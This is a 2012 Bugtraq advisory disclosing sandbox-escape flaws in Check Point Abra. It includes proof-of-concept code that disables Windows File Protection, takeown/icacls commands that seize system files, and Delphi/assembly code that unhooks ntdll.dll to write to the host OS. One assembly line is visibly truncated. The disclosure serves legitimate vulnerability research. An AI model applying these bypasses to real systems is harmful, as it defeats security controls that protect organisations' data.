[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Checkpoint Abra - Vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Checkpoint Abra - Vulnerabilities
- From: komarov@xxxxxxxxxxx
- Date: Sat, 7 Jul 2012 09:45:08 GMT
Check Point Abra Vulnerabilities
#############################################
Vendor: Check Point Software Technologies Ltd
Product web page: http://rus.checkpoint.com/products/abra/index.html;
http://www.checkpoint.com/products/go/
Platforms: Windows XP, Vista, 7 (32 bit)
Authors: Belov V., Komarov A. (Group-IB)
#############################################
Summary: Check Point Abra allows you to create a secure virtual workspace on
any PC, this solution may significantly affect the way of organizing the work
of mobile employees. With Abra solutions you can easily turn any PC into a
fully secure workplace, so you no longer need to carry bulky laptops or heavy
folders. Convenient USB-drive form factor body allows you to quickly create a
virtual workplace, while the virtualization technology and built-in encryption
ensures the mobile data safety. Abra provides users with protection when
working in offline mode by an encrypted USB-drive, and online - through VPN
client software.
Description: Imperfect control modules and data monitoring application allows
you to run any file, bypassing the current policy around virtualization, and
read\write data from an isolated Abra session directly into the PC operating
system, conduct phishing attacks, etc.
#############################################################################
Run third-party software in a secure session:
Control rules used applications are in the file
X:\PWC\data\sandbox-persistence.ref (и X:\PWC\data\ swspogo.xml,
F:\PWC\data\ ISWPolicy.xml, X:\PWC\data\ ics_policy.xml). Any application not
from the white list will not be able to perform when working in a secure
session.
As part of the session is allowed to run the pre-installed software: Internet
Explorer, Notepad, Calculator, Office, Remote Desktop Connection (+ Portable
Apps) to use system utilities, and host machines that are clearly indicated in
the configuration file F:\PWC\data\sandbox-persistence.ref.
Example:
<Execute OriginalName="calc.exe" PathName="\calc.exe" AppName="Microsoft
Calculator" UIDescription="Microsoft Calculator" id="134"/>
Application Control session examines the application run only on paths, file
names, as well as record VersionInfo in the file.
This implies you can import an arbitrary application and run it to bypass the
control policy of applications. This is implemented by changing the file name
and the field in the resource OriginalFilename VERSIONINFO on any of the white
list. Moreover, the user may replace any executable file (eg archiver WinRar)
to the host OS without any imports into the secure session and the file will
automatically be filled in a secure session (run by the correspondences of
extensions, or from the "start" menu).
It is also possible to substitute the system default software from the session
"Start" menu (Internet Explorer, Notepad, Calculator, File Protection is off to
the host OS, you need administrator rights). The substitution of system files
can be implemented after disabling File Protection Windows File Protection with
a call to the fifth ordinal of exported file system sfc_os.dll functions
(windows xp), sample code:
hInst := LoadLibrary('sfc_os.dll');
proc := GetProcAddress(hInst, ordinal 5);
filename := 'c:\windows\system32\calc.exe';
asm
push -1
push filename
push 0
call proc
end
Either by modifying the rights to the file (Vista and above):
takeown /f <имя_файла>
icacls <имя_файла> /grant
%username%:F
icacls <имя_файла> /grant
*S-1-1-0:(F)
It is also well executed Bat-files downloaded from the host computer?s folder
called "Downloaded from PC", or any other.
The structure of the boot process and secure session:
During the secure session creates a separate process group. Executable files
and libraries are the product of two assemblies 32 and 64-bit. But despite
this, the 64-bit systems still run a few 32-bit modules in the X folder: \ Go \
PWC \ WoW64.
The second copy process launches the ISWMGR.exe Explorer explorer.exe
processes, which is the parent of all, offered in a secure session of external
tools and imported programs.
When starting the imported files in a secure session they run a separate
application-boot X: \ PWC \ WOW64 \ ISWLDR.dat. He, in turn, loads the library
ISWUL.dll, causing the function to set InitHook interceptions. Installed hooks
calling functions for working with files, the registry, the clipboard,
cryptography, etc:
HANDLE (__stdcall *__cdecl GetAddrOf_SetClipboardData())(UINT, HANDLE)
{
HANDLE (__stdcall *result)(UINT, HANDLE); // eax@1
result = SetClipboardData;
addr_SetClipboardData = SetClipboardData;
return result;
}
int __cdecl hooks_Clipboard()
{
int v0; // eax@1
int v1; // eax@3
int v2; // eax@5
int v3; // eax@7
int result; // eax@9
v0 = splice_func(addr_SetClipboardData, callback_SetClipboardData);
if ( v0 )
addr_SetClipboardData = v0;
v1 = splice_func(addr_GetClipboardData, callback_GetClipboardData);
if ( v1 )
addr_GetClipboardData = v1;
v2 = splice_func(addr_OpenClipboard, callback_OpenClipboard);
if ( v2 )
addr_OpenClipboard = v2;
v3 = splice_func(addr_EmptyClipboard, callback_EmptyClipboard);
if ( v3 )
addr_EmptyClipboard = v3;
result = splice_func(addr_CloseClipboard, callback_CloseClipboard);
if ( result )
addr_CloseClipboard = result;
return result;
}
It is possible to bypass interceptor functions by their release (recovery of
the original code functions as it was before the modification) - direct reading
from a file system folder (for the use of technology before the reading system
files must be copied to a temporary folder and install a structured exception
handler), such as ntdll.dll, read the first 10-15 bytes of the function from
the file and overwrite the buffer was read the prologue of the corresponding
function in the memory (which is the function of the jump-hook, for example
ZwLoadDriver).
Technique, for example, can allow making changes to files \ Registry of the
secure session directly to the host system.
procedure resolve_APIs_from_dll_images(mapped_dll_base: pointer; dllname:
string);
var
var_4, var_8, var_10, var_20, var_24, var_2C, var_28, var_3C, var_1C, dllbase,
Src, old: DWORD;
begin
asm
pushad
mov eax, [mapped_dll_base]
mov ecx, [eax+3Ch]
mov edx, [mapped_dll_base]
lea eax, [edx+ecx+18h]
mov [var_10], eax
mov ecx, [var_10]
mov edx, [mapped_dll_base]
add edx, [ecx+60h]
mov [var_4], edx
mov eax, [var_4]
mov ecx, [mapped_dll_base]
add ecx, [eax+1Ch]
mov [var_8], ecx
mov ecx, [var_4]
mov edx, [mapped_dll_base]
add edx, [ecx+20h]
mov [var_20], edx
mov eax, [var_4]
mov ecx, [mapped_dll_base]
add ecx, [eax+24h]
mov [var_2C], ec
push dllname
call LoadLibrary
mov [var_28], eax
cmp [var_28], 0
jne @loc_41D111
jmp @ending
@loc_41D111:
mov [var_24], 0
jmp @loc_41D135
@loc_41D11A:
mov eax, [var_24]
add eax, 1
mov [var_24], eax
mov ecx, [var_20]
add ecx, 4
mov [var_20], ecx
mov edx, [var_2C]
add edx, 2
mov [var_2C], edx
@loc_41D135:
mov eax, [var_4]
mov ecx, [var_24]
cmp ecx, [eax+18h]
jnb @ending
mov ecx, [var_24]
mov edx, [var_20]
mov eax, [mapped_dll_base]
add eax, [edx]
mov ecx, [var_24]
mov edx, [var_8]
mov eax, [var_28]
add eax, [edx+ecx*4]
mov [var_3C], eax
mov ecx, [var_24]
mov edx, [var_8]
mov eax, [mapped_dll_base]
add eax, [edx+ecx*4]
mov [Src], eax
push 0Ah
mov ecx, [Src]
push ecx
lea edx, [Dst]
push edx
call memcpy
add esp, 0Ch
lea eax, [old]
push eax
push PAGE_EXECUTE_READWRITE
push 0Ah
mov eax, [var_3C]
push eax
call VirtualProtect
push 0Ah
lea ecx, [Dst]
push ecx
mov eax, [var_3C]
push eax
call memcpy
add esp, 0Ch
jmp @loc_41D11A
@ending:
popad
end;
end;
function UnHook(dllname: string): boolean;
var
MapOffset: pointer;
dll, filename: string;
MapHandle, FileHandle: THandle;
Begin
dll := SystemDir + '\' + dllname;
filename := GetSpecialPath(CSIDL_APPDATA) + '\' + dllname;
result := CopyFile(PChar(dll), PChar(filename), false);
if result then
begin
FileHandle := CreateFile(pChar(filename), GENERIC_READ, FILE_SHARE_READ, nil,
OPEN_EXISTING, 0, 0);
If FileHandle <> INVALID_HANDLE_VALUE then
Try
MapHandle := CreateFileMapping(FileHandle, nil, $1000002, 0, 0, nil);
If MapHandle <> 0 then
Try
MapOffset := MapViewOfFile(MapHandle, FILE_MAP_READ, 0, 0, 0);
If MapOffset <> nil then
Try
resolve_APIs_from_dll_images(MapOffset, dllname);
Finally
UnmapViewOfFile(MapOffset);
End;
Finally
CloseHandle(MapHandle);
End;
Finally
CloseHandle(FileHandle);
End;
DeleteFile(filename);
end;
End;
procedure Write2File(filename, s: string);
var
f: textfile;
begin
assignfile(f, filename);
rewrite(f);
writeln(f, s);
closefile(f);
end;
begin
UnHook('ntdll.dll');
..
Write2File('c:\users\Administrator\Desktop\POC.txt', 'Now we writing to host
OS');
end;
############################################
Possible implementation of a phishing attack by modifying the file etc \ hosts
host system, all changes in it are also automatically applied for the secure
session.